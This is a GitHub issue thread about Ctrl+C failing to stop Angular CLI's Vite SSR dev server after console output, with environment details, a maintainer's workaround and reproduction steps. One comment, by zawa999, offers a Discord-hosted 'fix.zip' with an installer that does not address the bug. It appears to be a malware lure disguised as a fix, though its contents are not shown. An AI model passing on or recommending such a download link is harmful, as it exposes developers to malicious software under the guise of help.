### ISSUE TITLE
Ctrl + C  is not working dev-server with SSR

### ISSUE THREAD

**Issue by helloaliimran** [angular/angular-cli#28336]
### Command

serve

### Is this a regression?

- [x] Yes, this behavior used to work in the previous version

### The previous version in which this bug was not present was

17

### Description

The Ctrl+C command is not working to stop the application from the terminal.

### Minimal Reproduction

I face this problem after updating angular material : ng update @angular/material

### Your Environment

```text
_                      _                 ____ _     ___
    / \   _ __   __ _ _   _| | __ _ _ __     / ___| |   |_ _|
   / △ \ | '_ \ / _` | | | | |/ _` | '__|   | |   | |    | |
  / ___ \| | | | (_| | |_| | | (_| | |      | |___| |___ | |
 /_/   \_\_| |_|\__, |\__,_|_|\__,_|_|       \____|_____|___|
                |___/
    

Angular CLI: 18.2.2
Node: 20.11.1
Package Manager: npm 9.8.1
OS: win32 x64

Angular: 18.2.2
... animations, cdk, cli, common, compiler, compiler-cli, core
... forms, material, platform-browser, platform-browser-dynamic
... platform-server, router, ssr

Package                         Version
---------------------------------------------------------
@angular-devkit/architect       0.1802.2
@angular-devkit/build-angular   18.2.2
@angular-devkit/core            18.2.2
@angular-devkit/schematics      18.2.2
@schematics/angular             18.2.2
rxjs                            7.8.1
typescript                      5.4.3
zone.js                         0.14.10
```

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by alan-agius4** [comment]
Are you using the vite based dev-server with ssr?

**Comment by helloaliimran** [comment]
> vite based dev-server

no I am using simple  VS Code compiler, and yes SSR is enable.

**Comment by alan-agius4** [comment]
I'm not entirely sure what you mean by "VS Code compiler" in this context. You can either be using the Webpack or Vite based dev-server. Given that you're using SSR and encountering this issue, it's probable that you're working with the Vite dev server.

This is a known issue in this case, and is appears to be caused `zone.js`. As a workaround, you can use `q + <enter>`.

//cc @JiaLiPassion

**Comment by anisabboud** [comment]
Encountering the same issue for the past couple of weeks... (Angular 18.2 with Vite/SSR, WSL shell)
`ng serve` => `Ctrl + C` sometimes works, and oftentimes stops working; especially when there's a console log.

### Reproduction
1. `app.component.ts` → `constructor() { console.log('hello'); }`
2. `ng serve`
3. Navigate to http://localhost:4200
4. `hello` will be printed to the terminal, and after that `Ctrl + C` doesn't work
   ![image](https://github.com/user-attachments/assets/b4cee125-51a0-4670-910e-28f801616a4b)

### Workarounds
`Ctrl + D` or `q + <enter>` work.

**Comment by zygarios** [comment]
I have the same problem

**Comment by kuncevic** [comment]
same problem here, initially thought taking place only in vs code but however same using external terminal

**Comment by kuncevic** [comment]
same problem here, initially thought taking place only in vs code but however same using external terminal.
If you just serve and then `ctrl+c` all works, tho breaks after you `console.log`
